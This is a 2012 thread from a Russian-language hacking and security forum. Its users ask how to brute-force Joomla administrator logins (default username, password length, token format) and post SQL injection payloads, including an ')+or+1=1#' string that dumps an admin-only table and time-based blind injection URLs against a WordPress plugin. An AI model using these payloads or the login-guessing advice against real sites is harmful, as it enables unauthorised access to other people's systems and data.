HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #441  
Старый 01.12.2012, 18:07
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125

Репутация: 3
По умолчанию

хочу заняться брутом джумлы

есть словарик, но там даже 1 символьные пароли есть

есть ли у джумлы минимальная длина пасса?

логин - administrator стандартный?
 
Ответить с цитированием

  #442  
Старый 01.12.2012, 19:06
shak777
Guest
Сообщений: n/a
Провел на форуме:
1398

Репутация: 0
По умолчанию

Есть скуля типа

Код:
Code:
')+or+1=1#
При вводе урла типа

Код:
Code:
http://examle.com/search.php?q=')+or+1=1#
На выходе получаю дамп таблицы к которой(таблице) иеет доступ только админ сайта. Можно ли как то узнать версию mysql и имя бд? Спасибо.
 
Ответить с цитированием

  #443  
Старый 01.12.2012, 20:34
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от vaddd  
vaddd said:
хочу заняться брутом джумлы
есть словарик, но там даже 1 символьные пароли есть
есть ли у джумлы минимальная длина пасса?
логин - administrator стандартный?
ограничений вроде как нет.

Дефолтный логин - admin
 
Ответить с цитированием

  #444  
Старый 01.12.2012, 20:45
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125

Репутация: 3
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:
ограничений вроде как нет.
Дефолтный логин - admin
ну добавлю и admin и администратор)

т.е можно начинать со всех 1-2-3 символьных паролей брут?
 
Ответить с цитированием

  #445  
Старый 01.12.2012, 22:48
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125

Репутация: 3
По умолчанию

на джумле везде токены есть?

Цитата:
Сообщение от None  

 
Ответить с цитированием

  #446  
Старый 02.12.2012, 12:17
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от vaddd  
vaddd said:
ну добавлю и admin и администратор)
т.е можно начинать со всех 1-2-3 символьных паролей брут?
неправда. У id =62 логин admin, логина administrator по умолчанию в Joomla нету.

Цитата:
Сообщение от None  
на джумле везде токены есть?
Начиная с версии 1.5
 
Ответить с цитированием

  #447  
Старый 02.12.2012, 23:09
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125

Репутация: 3
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:
неправда. У id =62 логин admin, логина administrator по умолчанию в Joomla нету.
Начиная с версии 1.5
а у токенов всегда одинаковый формат?

или где-то будет по другому?
 
Ответить с цитированием

  #448  
Старый 03.12.2012, 02:40
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от vaddd  
vaddd said:
а у токенов всегда одинаковый формат?

или где-то будет по другому?
одинаковый. Вида мд5, 32 символа.
 
Ответить с цитированием

  #449  
Старый 04.12.2012, 23:33
Pinkie
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

чем отправлять post запрос на сайт чужой?
 
Ответить с цитированием

  #450  
Старый 09.12.2012, 16:07
blesse
Guest
Сообщений: n/a
Провел на форуме:
29647

Репутация: 1
По умолчанию

Сабж:Пытаюсь провести на уязвимом плагине wp SQL инъекцию,

Плагин на exploit-db

Poc: http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,10 9,97,112))),0)--%20

Я запрашиваю:

1)http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(100000,BENCHMARK(100000,md5(ble sse()))),0)--%20

2)http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,sleep(30),0)--%20

Какой либо задержки в обоих случаях не последовало.

Плагин на котором экспериментирую скачал от туда же(эксплоит помечен как верифицированный)mq=off. Значит где то я синтаксис нарушил?Или в чем может быть трабла?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Уязвимости CMS / форумов 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ